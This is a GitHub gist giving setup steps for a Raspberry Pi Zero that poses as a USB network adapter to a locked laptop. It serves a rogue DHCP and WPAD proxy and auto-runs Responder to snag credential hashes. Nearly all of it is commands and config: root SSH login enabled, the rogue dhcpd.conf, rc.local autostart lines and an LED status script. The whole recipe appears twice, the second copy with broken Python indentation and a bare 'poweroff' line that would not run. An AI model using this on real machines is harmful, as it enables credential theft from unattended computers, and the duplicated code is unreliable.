milo2012/gist:1c638b19b61c1338e21bad23705ff8fb

## gistfile1.txt
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Rasberry Pi Zero

##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler and write image to MicroSD
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
$ apt-get install inotify-tools

$ aptitude -y install isc-dhcp-server

##Change PermitRootLogin value to 'Yes'
$ nano /etc/ssh/sshd_config
PermitRootLogin yes

$ nano /etc/network/interfaces
auto usb0
allow-hotplug usb0
iface usb0 inet static
  address 192.168.2.201
  netmask 255.255.255.0
  gateway 192.168.2.1

$ nano /etc/dhcp/dhcpd.conf
ddns-update-style none;

option domain-name "domain.local";
option domain-name-servers 192.168.2.201;

default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
option local-proxy-config code 252 = text;
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.1 192.168.2.2;
  option routers 192.168.2.201;
  option local-proxy-config "http://192.168.2.201/wpad.dat";
}

$ /etc/init.d/dhcpcd restart
$ nano /etc/rc.local
#!/bin/sh -e
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
/usr/bin/screen -dmS responder bash -c 'cd /pentest/Responder/; python Responder.py -I usb0 -f -w -r -d -F -P'
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/Responder/Responder.db; do poweroff; done'
#/usr/bin/screen -dmS checkStatus bash -c 'cd /pentest; python checkStatus.py'
exit 0

$ nano /root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

$ nano /pentest/checkStatus.py
import os
import glob
import time

while True:
	fileList=glob.glob('/pentest/Responder/logs/*.txt')
	if len(fileList)>0:
		cmd = "echo 1 | sudo tee /sys/class/leds/led0/brightness"
		os.system(cmd)
		poweroff
	else:
		cmd = "echo 0 | sudo tee /sys/class/leds/led0/brightness"
		os.system(cmd)
	time.sleep(1)

##Plug the Raspberry Pi Zero device to the laptop using the Micro USB cable.
##Responder will attempt to capture the credentials
##The LED on Raspberry Pi turns off when credentials are captured.
	##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
	##Installation on Rasberry Pi Zero

	##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
	##Use Pi Filler and write image to MicroSD
	##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC
	$ cd /pentest
	$ apt-get install -y python git python-pip python-dev screen sqlite3
	$ pip install pycrypto
	$ git clone https://github.com/lgandx/Responder
	$ apt-get install inotify-tools

	$ aptitude -y install isc-dhcp-server

	##Change PermitRootLogin value to 'Yes'
	$ nano /etc/ssh/sshd_config
	PermitRootLogin yes

	$ nano /etc/network/interfaces
	auto usb0
	allow-hotplug usb0
	iface usb0 inet static
	address 192.168.2.201
	netmask 255.255.255.0
	gateway 192.168.2.1

	$ nano /etc/dhcp/dhcpd.conf
	ddns-update-style none;

	option domain-name "domain.local";
	option domain-name-servers 192.168.2.201;

	default-lease-time 60;
	max-lease-time 72;
	authoritative;
	log-facility local7;
	option local-proxy-config code 252 = text;
	subnet 192.168.2.0 netmask 255.255.255.0 {
	range 192.168.2.1 192.168.2.2;
	option routers 192.168.2.201;
	option local-proxy-config "http://192.168.2.201/wpad.dat";
	}

	$ /etc/init.d/dhcpcd restart
	$ nano /etc/rc.local
	#!/bin/sh -e
	rm -f /var/lib/dhcp/dhcpd.leases
	touch /var/lib/dhcp/dhcpd.leases
	/usr/sbin/dhcpd
	/usr/bin/screen -dmS responder bash -c 'cd /pentest/Responder/; python Responder.py -I usb0 -f -w -r -d -F -P'
	/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/Responder/Responder.db; do poweroff; done'
	#/usr/bin/screen -dmS checkStatus bash -c 'cd /pentest; python checkStatus.py'
	exit 0

	$ nano /root/.screenrc
	# Logging
	deflog on
	logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

	$ nano /pentest/checkStatus.py
	import os
	import glob
	import time

	while True:
	fileList=glob.glob('/pentest/Responder/logs/*.txt')
	if len(fileList)>0:
	cmd = "echo 1 \| sudo tee /sys/class/leds/led0/brightness"
	os.system(cmd)
	poweroff
	else:
	cmd = "echo 0 \| sudo tee /sys/class/leds/led0/brightness"
	os.system(cmd)
	time.sleep(1)

	##Plug the Raspberry Pi Zero device to the laptop using the Micro USB cable.
	##Responder will attempt to capture the credentials
	##The LED on Raspberry Pi turns off when credentials are captured.